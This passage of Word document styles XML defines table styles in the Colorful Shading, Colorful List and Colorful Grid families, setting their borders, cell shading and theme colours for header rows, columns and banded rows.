      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BEB4AD" w:themeFill="accent3" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="232">
    <w:name w:val="Colorful Shading Accent 4"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="71"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="24" w:space="0"/>
        <w:left w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="4" w:space="0"/>
        <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="4" w:space="0"/>
        <w:right w:val="single" w:color="B4936D" w:themeColor="accent4"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7F4F0" w:themeFill="accent4" w:themeFillTint="19"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="7A6A60"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72583A" w:themeFill="accent4"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72583A" w:themeFill="accent4"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72583A" w:themeFill="accent4" w:themeFillShade="99"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0D3C4" w:themeFill="accent4" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9C9B6"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3">
    <w:name w:val="Colorful Shading Accent 5"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="71"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="24" w:space="0"/>
        <w:left w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="4" w:space="0"/>
        <w:bottom w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="4" w:space="0"/>
        <w:right w:val="single" w:color="67787B" w:themeColor="accent5"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EFF1F2" w:themeFill="accent5" w:themeFillTint="19"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="9D936F"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3D4749" w:themeFill="accent5"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3D4749" w:themeFill="accent5"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3D4749" w:themeFill="accent5" w:themeFillShade="99"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C1C9CB" w:themeFill="accent5" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2BCBE"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4">
    <w:name w:val="Colorful Shading Accent 6"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="71"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="24" w:space="0"/>
        <w:left w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="4" w:space="0"/>
        <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="4" w:space="0"/>
        <w:right w:val="single" w:color="9D936F" w:themeColor="accent6"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5F4F0" w:themeFill="accent6" w:themeFillTint="19"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="67787B"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5F5941" w:themeFill="accent6"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5F5941" w:themeFill="accent6"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5F5941" w:themeFill="accent6" w:themeFillShade="99"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D7D3C5" w:themeFill="accent6" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CEC9B7"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5">
    <w:name w:val="Colorful List"/>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E5E5E5" w:themeFill="text1"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B56E3A" w:themeFill="accent2" w:themeFillShade="CC"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="B66F3A" w:themeColor="accent2"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BFBFBF" w:themeFill="text1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC" w:themeFill="text1" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="236">
    <w:name w:val="Colorful List Accent 1"/>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B56E3A" w:themeFill="accent2" w:themeFillShade="CC"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="B66F3A" w:themeColor="accent2"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DFE5EA" w:themeFill="accent1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5EAEE" w:themeFill="accent1" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="237">
    <w:name w:val="Colorful List Accent 2"/>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9F3EF" w:themeFill="accent2"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B56E3A" w:themeFill="accent2" w:themeFillShade="CC"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="B66F3A" w:themeColor="accent2"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F2E3D7" w:themeFill="accent2" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4E8DF" w:themeFill="accent2" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="238">
    <w:name w:val="Colorful List Accent 3"/>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98764E" w:themeFill="accent4" w:themeFillShade="CC"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="99764E" w:themeColor="accent4"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DFD9D6" w:themeFill="accent3" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E0DE" w:themeFill="accent3" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="239">
    <w:name w:val="Colorful List Accent 4"/>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61544C" w:themeFill="accent3" w:themeFillShade="CC"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="62554D" w:themeColor="accent3"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ECE4DA" w:themeFill="accent4" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EFE9E1" w:themeFill="accent4" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="240">
    <w:name w:val="Colorful List Accent 5"/>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7F7656" w:themeFill="accent6" w:themeFillShade="CC"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="807757" w:themeColor="accent6"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D8DEDF" w:themeFill="accent5" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E4E5" w:themeFill="accent5" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="241">
    <w:name w:val="Colorful List Accent 6"/>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525F62" w:themeFill="accent5" w:themeFillShade="CC"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="526062" w:themeColor="accent5"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E6E4DB" w:themeFill="accent6" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBE9E2" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="242">
    <w:name w:val="Colorful Grid"/>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CCCCCC" w:themeFill="text1" w:themeFillTint="33"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="999999" w:themeFill="text1" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="999999" w:themeFill="text1" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F" w:themeFill="text1" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F" w:themeFill="text1" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="243">
    <w:name w:val="Colorful Grid Accent 1"/>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5EAEE" w:themeFill="accent1" w:themeFillTint="33"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CBD5DE" w:themeFill="accent1" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CBD5DE" w:themeFill="accent1" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="577188" w:themeFill="accent1" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="577188" w:themeFill="accent1" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BECBD6" w:themeFill="accent1" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BECBD6" w:themeFill="accent1" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="244">
    <w:name w:val="Colorful Grid Accent 2"/>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F4E8DF" w:themeFill="accent2" w:themeFillTint="33"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAD1BF" w:themeFill="accent2" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAD1BF" w:themeFill="accent2" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="AA6736" w:themeFill="accent2" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="AA6736" w:themeFill="accent2" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5C6AF" w:themeFill="accent2" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5C6AF" w:themeFill="accent2" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="245">
    <w:name w:val="Colorful Grid Accent 3"/>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5E0DE" w:themeFill="accent3" w:themeFillTint="33"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CBC2BD" w:themeFill="accent3" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CBC2BD" w:themeFill="accent3" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="5B4F47" w:themeFill="accent3" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="5B4F47" w:themeFill="accent3" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BEB4AD" w:themeFill="accent3" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BEB4AD" w:themeFill="accent3" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="246">
    <w:name w:val="Colorful Grid Accent 4"/>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FE9E1" w:themeFill="accent4" w:themeFillTint="33"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0D3C4" w:themeFill="accent4" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0D3C4" w:themeFill="accent4" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="8F6E49" w:themeFill="accent4" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="8F6E49" w:themeFill="accent4" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9C9B6" w:themeFill="accent4" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9C9B6" w:themeFill="accent4" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="247">
    <w:name w:val="Colorful Grid Accent 5"/>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0E4E5" w:themeFill="accent5" w:themeFillTint="33"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C1C9CB" w:themeFill="accent5" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C1C9CB" w:themeFill="accent5" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4D595C" w:themeFill="accent5" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4D595C" w:themeFill="accent5" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2BCBE" w:themeFill="accent5" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2BCBE" w:themeFill="accent5" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="248">
    <w:name w:val="Colorful Grid Accent 6"/>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BE9E2" w:themeFill="accent6" w:themeFillTint="33"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D7D3C5" w:themeFill="accent6" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D7D3C5" w:themeFill="accent6" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="776F51" w:themeFill="accent6" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="776F51" w:themeFill="accent6" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
